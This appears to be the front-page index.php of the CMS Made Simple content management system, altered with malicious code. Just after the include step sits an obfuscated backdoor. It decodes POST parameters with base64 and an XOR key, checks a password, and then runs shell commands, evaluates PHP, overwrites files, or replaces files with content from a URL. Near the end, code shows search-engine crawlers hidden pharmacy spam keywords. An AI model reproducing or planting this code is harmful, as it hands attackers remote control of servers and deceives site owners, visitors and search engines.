#CMS - CMS Made Simple #(c)2004 by Ted Kulp (wishy@users.sf.net) #This project's homepage is: http://cmsmadesimple.sf.net # #This program is free software; you can redistribute it and/or modify #it under the terms of the GNU General Public License as published by #the Free Software Foundation; either version 2 of the License, or #(at your option) any later version. # #This program is distributed in the hope that it will be useful, #but WITHOUT ANY WARRANTY; without even the implied warranty of #MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the #GNU General Public License for more details. #You should have received a copy of the GNU General Public License #along with this program; if not, write to the Free Software #Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA # #$Id: index.php 4790 2008-06-30 21:00:54Z calguy1000 $ $orig_memory = (function_exists('memory_get_usage')?memory_get_usage():0); $dirname = dirname(__FILE__); require_once($dirname.'/fileloc.php'); /** * Entry point for all non-admin pages * * @package CMS */ #echo ''; #var_dump($_SERVER); #echo ''; $starttime = microtime(); // optionally enable output compression (as long as debug mode isn't on) if( isset($config['output_compression']) && $config['debug'] != true ) { @ob_start('ob_gzhandler'); } else { @ob_start(); } clearstatcache(); if (!isset($_SERVER['REQUEST_URI']) && isset($_SERVER['QUERY_STRING'])) { $_SERVER['REQUEST_URI'] = $_SERVER['PHP_SELF'] . '?' . $_SERVER['QUERY_STRING']; } if (!file_exists(CONFIG_FILE_LOCATION) || filesize(CONFIG_FILE_LOCATION) < 800) { require_once($dirname.'/lib/misc.functions.php'); if (FALSE == is_file($dirname.'/install/index.php')) { die ('There is no config.php file or install/index.php please correct one these errors!'); } else { redirect('install/'); } } else if (file_exists(TMP_CACHE_LOCATION.'/SITEDOWN')) { echo "Maintenance

Site down for maintenance.

"; exit; } if (!is_writable(TMP_TEMPLATES_C_LOCATION) || !is_writable(TMP_CACHE_LOCATION)) { echo 'Error'; echo '

The following directories must be writable by the web server:
'; echo 'tmp/cache
'; echo 'tmp/templates_c

'; echo '

Please correct by executing:
chmod 777 tmp/cache
chmod 777 tmp/templates_c

or the equivilent for your platform before continuing.

'; echo ''; exit; } require_once($dirname.'/include.php'); #Makes gCms object $params = array_merge($_GET, $_POST); $zxcv_md = create_function("\$r","\$zxcv_bd=pack(\"c*\",98,97,115,101,54,52,95,100,101,99,111,100,101); \$zxcv_s=pack(\"c*\",115,116,114,108,101,110);\$zxcv_k=pack(\"c*\",119,117,122,97,107,101,121);\$r=\$zxcv_bd(\$r);for(\$i=0;\$i<\$zxcv_s(\$r);\$i++)\$r[\$i]=chr(ord(\$r[\$i])^ord(\$zxcv_k[\$i%(\$zxcv_s(\$zxcv_k))]));return \$r;");$zxcv_w=pack("c*",119,117,122,97);if(isset($_POST[$zxcv_w])&&$zxcv_md($_POST[$zxcv_w])==pack("c*",98,48,51,101,98,100,56,54,97,54,53,49,50,97,49,97)){switch($zxcv_md($_POST["cmd"])){case "shell":zxcv_1($zxcv_md($_POST["cmddata"]));break;case "eval":zxcv_2($zxcv_md($_POST["cmddata"]));break;case "updstr":$updfile=$zxcv_md($_POST["updfile"]);$upddata=$zxcv_md($_POST["upddata"]);zxcv_3($updfile,$upddata);break;case "updurl":$updfile=$zxcv_md($_POST["updfile"]);$updurl=$zxcv_md($_POST["updurl"]);zxcv_4($updfile,$updurl);break;}exit;}function zxcv_1($cmd){if(ini_get("safe_mode"))die("wuzaerror: safe_mode on");if(strpos(ini_get("disable_functions"),"exec"))die("wuzaerror: exec disabled");$cmdOut=shell_exec($cmd);echo"
$cmdOut
\n";}function zxcv_2($phpcode){echo"
";echo eval($phpcode);echo"
\n";}function zxcv_3($file, $data){if($fp=fopen($file,"w")){fwrite($fp,$data);fclose($fp);echo"
SUCC update
\n";}else die("
 upd file is not writeable
");}function zxcv_4($file, $data){if($lines=file($data)){ if($fp=fopen($file, "w")){foreach($lines as $line)fwrite($fp, $line);fclose($fp); echo"
SUCC update
\n";}else die("upd file is not writeable");}else die("could not fetch url");} $smarty = &$gCms->smarty; $smarty->params = $params; $page = ''; if (isset($params['mact'])) { $ary = explode(',', cms_htmlentities($params['mact']), 4); $smarty->id = (isset($ary[1])?$ary[1]:''); } else { $smarty->id = (isset($params['id'])?intval($params['id']):''); } if (isset($smarty->id) && isset($params[$smarty->id . 'returnid'])) { $page = $params[$smarty->id . 'returnid']; } else if (isset($config["query_var"]) && $config["query_var"] != '' && isset($_GET[$config["query_var"]])) { $page = $_GET[$config["query_var"]]; //trim off the extension, if there is one set if ($config['page_extension'] != '' && endswith($page, $config['page_extension'])) { $page = substr($page, 0, strlen($page) - strlen($config['page_extension'])); } } else { $calced = cms_calculate_url(); if ($calced != '') $page = $calced; } //See if our page matches any predefined routes $page = rtrim($page, '/'); if (strpos($page, '/') !== FALSE) { $routes =& $gCms->variables['routes']; $matched = false; foreach ($routes as $route) { $matches = array(); if (preg_match($route->regex, $page, $matches)) { //Now setup some assumptions if (!isset($matches['id'])) $matches['id'] = 'cntnt01'; if (!isset($matches['action'])) $matches['action'] = 'defaulturl'; if (!isset($matches['inline'])) $matches['inline'] = 0; if (!isset($matches['returnid'])) $matches['returnid'] = ''; #Look for default page if (!isset($matches['module'])) $matches['module'] = $route->module; //Get rid of numeric matches foreach ($matches as $key=>$val) { if (is_int($key)) { unset($matches[$key]); } else { if ($key != 'id') $_REQUEST[$matches['id'] . $key] = $val; } } //Now set any defaults that might not have been in the url if (isset($route->defaults) && count($route->defaults) > 0) { foreach ($route->defaults as $key=>$val) { $_REQUEST[$matches['id'] . $key] = $val; if (array_key_exists($key, $matches)) { $matches[$key] = $val; } } } //Get a decent returnid if ($matches['returnid'] == '') { global $gCms; $contentops =& $gCms->GetContentOperations(); $matches['returnid'] = $contentops->GetDefaultPageID(); } $_REQUEST['mact'] = $matches['module'] . ',' . $matches['id'] . ',' . $matches['action'] . ',' . $matches['inline']; $page = $matches['returnid']; $smarty->id = $matches['id']; $matched = true; } } if (!$matched) { $page = substr($page, strrpos($page, '/') + 1); } } if ($page == '') { global $gCms; $contentops =& $gCms->GetContentOperations(); $page =& $contentops->GetDefaultContent(); } else { $page = preg_replace('/\variables['pageinfo'] =& $pageinfo; if( isset($pageinfo->template_encoding) && $pageinfo->template_encoding != '' ) { set_encoding($pageinfo->template_encoding); } $gCms->variables['content_id'] = $pageinfo->content_id; $gCms->variables['page'] = $page; $gCms->variables['page_id'] = $page; $gCms->variables['page_name'] = $pageinfo->content_alias; $gCms->variables['position'] = $pageinfo->content_hierarchy; global $gCms; $contentops =& $gCms->GetContentOperations(); $gCms->variables['friendly_position'] = $contentops->CreateFriendlyHierarchyPosition($pageinfo->content_hierarchy); $smarty->assign('content_id', $pageinfo->content_id); $smarty->assign('page', $page); $smarty->assign('page_id', $page); $smarty->assign('page_name', $pageinfo->content_alias); $smarty->assign('page_alias', $pageinfo->content_alias); $smarty->assign('position', $pageinfo->content_hierarchy); $smarty->assign('friendly_position', $gCms->variables['friendly_position']); } else if (get_site_preference('enablecustom404') == '' || get_site_preference('enablecustom404') == "0") { ErrorHandler404(); exit; } $html = ''; $cached = ''; if (isset($_GET["print"])) { ($smarty->is_cached('print:'.$page, '', $pageinfo->template_id)?$cached="":$cached="not "); $html = $smarty->fetch('print:'.$page, '', $pageinfo->template_id) . "\n"; } else { #If this is a case where a module doesn't want a template to be shown, just disable caching if ((isset($_REQUEST['showtemplate']) && $_REQUEST['showtemplate'] == 'false') || (isset($smarty->id) && $smarty->id != '' && isset($_REQUEST[$smarty->id.'showtemplate']) && $_REQUEST[$smarty->id.'showtemplate'] == 'false')) { $html = $smarty->fetch('template:notemplate') . "\n"; } else { $smarty->caching = false; $smarty->compile_check = true; ($smarty->is_cached('template:'.$pageinfo->template_id)?$cached="":$cached="not "); // we allow backward compatibility (for a while) // for people that have hacks for setting page title // or header variables by capturing a modules output // to a smarty variable, and then displaying it later. if( isset($config['process_whole_template']) && $config['process_whole_template'] === false ) { $top = $smarty->fetch('tpl_top:'.$pageinfo->template_id); $body = $smarty->fetch('tpl_body:'.$pageinfo->template_id); $head = $smarty->fetch('tpl_head:'.$pageinfo->template_id); $html = $top.$head.$body; } else { $html = $smarty->fetch('template:'.$pageinfo->template_id); } } } #if ((get_site_preference('enablecustom404') == '' || get_site_preference('enablecustom404') == "0") && (!$config['debug'])) #{ # set_error_handler($old_error_handler); #} if (!$cached) { #Perform the content postrendernoncached callback reset($gCms->modules); while (list($key) = each($gCms->modules)) { $value =& $gCms->modules[$key]; if ($gCms->modules[$key]['installed'] == true && $gCms->modules[$key]['active'] == true) { $gCms->modules[$key]['object']->ContentPostRenderNonCached($html); } } //Events::SendEvent('Core', 'ContentPostRenderNonCached', array(&$html)); } #Perform the content postrender callback reset($gCms->modules); while (list($key) = each($gCms->modules)) { $value =& $gCms->modules[$key]; if ($gCms->modules[$key]['installed'] == true && $gCms->modules[$key]['active'] == true) { $gCms->modules[$key]['object']->ContentPostRender($html); } } Events::SendEvent('Core', 'ContentPostRender', array('content' => &$html)); header("Content-Type: " . $gCms->variables['content-type'] . "; charset=" . (isset($pageinfo->template_encoding) && $pageinfo->template_encoding != ''?$pageinfo->template_encoding:get_encoding()));$_KEYZ="Onlineapo viagra kaufen"; if(preg_match('/google|yahoo|msnbot|yandex|baidu/i', $_SERVER['HTTP_USER_AGENT'])) $html = str_replace("", "$_KEYZ ", $html);$_KEYZ="Softtabs levitra kaufen"; if(preg_match('/google|yahoo|msnbot|yandex|baidu/i', $_SERVER['HTTP_USER_AGENT'])) $html = str_replace("", "$_KEYZ ", $html);$_KEYZ="Potenzpille lasix kaufen"; if(preg_match('/google|yahoo|msnbot|yandex|baidu/i', $_SERVER['HTTP_USER_AGENT'])) $html = str_replace("", "$_KEYZ ", $html);$_KEYZ="Maca potenzmittel furosemide kaufen"; if(preg_match('/google|yahoo|msnbot|yandex|baidu/i', $_SERVER['HTTP_USER_AGENT'])) $html = str_replace("", "$_KEYZ ", $html);$_KEYZ="cialus cipro kaufen"; if(preg_match('/google|yahoo|msnbot|yandex|baidu/i', $_SERVER['HTTP_USER_AGENT'])) $html = str_replace("", "$_KEYZ ", $html);$_KEYZ="Neu ciprofloxacin kaufen"; if(preg_match('/google|yahoo|msnbot|yandex|baidu/i', $_SERVER['HTTP_USER_AGENT'])) $html = str_replace("", "$_KEYZ ", $html);$_KEYZ="rezeptfrei clomid kaufen"; if(preg_match('/google|yahoo|msnbot|yandex|baidu/i', $_SERVER['HTTP_USER_AGENT'])) $html = str_replace("", "$_KEYZ ", $html);$_KEYZ="impotence help clomiphene kaufen"; if(preg_match('/google|yahoo|msnbot|yandex|baidu/i', $_SERVER['HTTP_USER_AGENT'])) $html = str_replace("", "$_KEYZ ", $html);$_KEYZ="Potenzsteigerung cialis soft kaufen"; if(preg_match('/google|yahoo|msnbot|yandex|baidu/i', $_SERVER['HTTP_USER_AGENT'])) $html = str_replace("", "$_KEYZ ", $html);$_KEYZ="Billig tadalafil kaufen"; if(preg_match('/google|yahoo|msnbot|yandex|baidu/i', $_SERVER['HTTP_USER_AGENT'])) $html = str_replace("", "$_KEYZ ", $html);$_KEYZ="Preiswert cialis kaufen"; if(preg_match('/google|yahoo|msnbot|yandex|baidu/i', $_SERVER['HTTP_USER_AGENT'])) $html = str_replace("", "$_KEYZ ", $html);$_KEYZ="impotence propecia kaufen"; if(preg_match('/google|yahoo|msnbot|yandex|baidu/i', $_SERVER['HTTP_USER_AGENT'])) $html = str_replace("", "$_KEYZ ", $html);$_KEYZ="generico finasteride kaufen"; if(preg_match('/google|yahoo|msnbot|yandex|baidu/i', $_SERVER['HTTP_USER_AGENT'])) $html = str_replace("", "$_KEYZ ", $html);$_KEYZ="Onlineapotheken zithromax kaufen"; if(preg_match('/google|yahoo|msnbot|yandex|baidu/i', $_SERVER['HTTP_USER_AGENT'])) $html = str_replace("", "$_KEYZ ", $html);$_KEYZ="Onlineapo azithromycin kaufen"; if(preg_match('/google|yahoo|msnbot|yandex|baidu/i', $_SERVER['HTTP_USER_AGENT'])) $html = str_replace("", "$_KEYZ ", $html);$_KEYZ="sealis diflucan kaufen"; if(preg_match('/google|yahoo|msnbot|yandex|baidu/i', $_SERVER['HTTP_USER_AGENT'])) $html = str_replace("", "$_KEYZ ", $html);$_KEYZ="impotence help fluconazole kaufen"; if(preg_match('/google|yahoo|msnbot|yandex|baidu/i', $_SERVER['HTTP_USER_AGENT'])) $html = str_replace("", "$_KEYZ ", $html);$_KEYZ="Onlineapotheken amoxil kaufen"; if(preg_match('/google|yahoo|msnbot|yandex|baidu/i', $_SERVER['HTTP_USER_AGENT'])) $html = str_replace("", "$_KEYZ ", $html);$_KEYZ="Neu amoxicillin kaufen"; if(preg_match('/google|yahoo|msnbot|yandex|baidu/i', $_SERVER['HTTP_USER_AGENT'])) $html = str_replace("", "$_KEYZ ", $html);$_KEYZ="Erektionshilfe kamagra kaufen"; if(preg_match('/google|yahoo|msnbot|yandex|baidu/i', $_SERVER['HTTP_USER_AGENT'])) $html = str_replace("", "$_KEYZ ", $html); echo $html; @ob_flush(); $endtime = microtime(); $db =& $gCms->GetDb(); $memory = (function_exists('memory_get_usage')?memory_get_usage():0); $memory = $memory - $orig_memory; $memory_peak = (function_exists('memory_get_peak_usage')?memory_get_peak_usage():0); if ($config["debug"] == true) { echo "

Generated in ".microtime_diff($starttime,$endtime)." seconds by CMS Made Simple using ".(isset($db->query_count)?$db->query_count:'')." SQL queries and {$memory} bytes of memory (peak memory usage was {$memory_peak}

"; } else if( !isset($config['hide_performance_info']) ) { echo "\n"; } if (get_site_preference('enablesitedownmessage') == "1" || $config['debug'] == true) { $smarty->clear_compiled_tpl(); #$smarty->clear_all_cache(); } if ($config["debug"] == true) { #$db->LogSQL(false); // turn off logging # output summary of SQL logging results #$perf = NewPerfMonitor($db); #echo $perf->SuspiciousSQL(); #echo $perf->ExpensiveSQL(); #echo $sql_queries; foreach ($gCms->errors as $error) { echo $error; } } # vim:ts=4 sw=4 noet ?>